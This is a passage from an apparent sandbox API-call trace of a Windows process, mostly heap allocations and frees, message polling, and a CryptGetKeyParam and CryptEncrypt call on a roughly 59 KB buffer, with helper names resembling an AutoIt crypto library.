hHeap=0x770000) returned 1 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3f8 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0043.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889af0 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0043.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.400] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0043.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0043.400] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0043.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.401] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0043.402] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0043.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0043.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0043.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0043.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.402] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0043.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0043.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.402] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0043.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0043.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0043.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0043.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0043.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0043.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0043.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0043.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0043.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0043.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0043.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0043.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0043.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0043.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0043.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0043.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.406] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0043.406] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3e8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3e8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0043.406] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.406] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.406] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.406] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.406] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.406] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.406] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.406] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.406] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0043.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.406] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.406] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.406] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.406] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.406] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.406] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.407] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.407] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0043.407] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0043.407] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.407] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xe9d3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xe9e0) returned 1 [0043.407] CharLowerBuffW (in: lpsz="byte[59873]", cchLength=0xb | out: lpsz="byte[59873]") returned 0xb [0043.408] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.408] 